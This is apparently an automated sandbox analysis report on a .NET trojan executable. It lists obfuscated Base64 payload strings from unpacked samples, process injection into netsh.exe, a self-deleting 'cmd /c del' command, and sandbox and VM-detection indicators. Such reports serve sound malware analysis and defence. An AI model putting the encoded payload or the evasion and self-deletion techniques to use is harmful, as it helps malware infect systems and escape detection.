          Source: 4.0.vBugmobiJh.exe.150000.0.unpack, LogIn.csBase64 encoded string: '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
          Source: 6.2.vBugmobiJh.exe.430000.1.unpack, LogIn.csBase64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
          Source: 6.0.vBugmobiJh.exe.430000.0.unpack, LogIn.csBase64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@15/5
          Source: C:\Users\user\Desktop\vBugmobiJh.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vBugmobiJh.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01
          Source: vBugmobiJh.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\vBugmobiJh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\vBugmobiJh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: vBugmobiJh.exeVirustotal: Detection: 25%
          Source: unknownProcess created: C:\Users\user\Desktop\vBugmobiJh.exe 'C:\Users\user\Desktop\vBugmobiJh.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\vBugmobiJh.exe C:\Users\user\Desktop\vBugmobiJh.exe
          Source: unknownProcess created: C:\Users\user\Desktop\vBugmobiJh.exe C:\Users\user\Desktop\vBugmobiJh.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\vBugmobiJh.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess created: C:\Users\user\Desktop\vBugmobiJh.exe C:\Users\user\Desktop\vBugmobiJh.exe
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess created: C:\Users\user\Desktop\vBugmobiJh.exe C:\Users\user\Desktop\vBugmobiJh.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\vBugmobiJh.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\vBugmobiJh.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: vBugmobiJh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: vBugmobiJh.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.489757839.0000000006560000.00000002.00000001.sdmp
          Source: Binary string: netsh.pdb source: vBugmobiJh.exe, 00000006.00000002.268127639.0000000000EA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: vBugmobiJh.exe, 00000006.00000002.268267723.0000000000FDF000.00000040.00000001.sdmp, netsh.exe, 0000000A.00000002.476422535.0000000003B40000.00000040.00000001.sdmp
          Source: Binary string: netsh.pdbGCTL source: vBugmobiJh.exe, 00000006.00000002.268127639.0000000000EA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vBugmobiJh.exe, 00000006.00000002.268267723.0000000000FDF000.00000040.00000001.sdmp, netsh.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.489757839.0000000006560000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: vBugmobiJh.exe, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.vBugmobiJh.exe.2d0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.vBugmobiJh.exe.2d0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.vBugmobiJh.exe.150000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.vBugmobiJh.exe.150000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.vBugmobiJh.exe.430000.1.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.vBugmobiJh.exe.430000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_00CB0015 push 0030007Ah; retf
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_070961EC push eax; iretd
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_0040C8B1 push ss; iretd
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_00415CB8 push esi; ret
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_0041A5F2 push cs; retf
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BBD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F4C8B1 push ss; iretd
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F5B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F5B3FB push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F5B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F55CB8 push esi; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F5B45C push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F5A5F2 push cs; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.42173467133
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vBugmobiJh.exe PID: 5108, type: MEMORY
          Source: Yara matchFile source: 1.2.vBugmobiJh.exe.2774880.1.raw.unpack, type: UNPACKEDPE
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\vBugmobiJh.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\vBugmobiJh.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
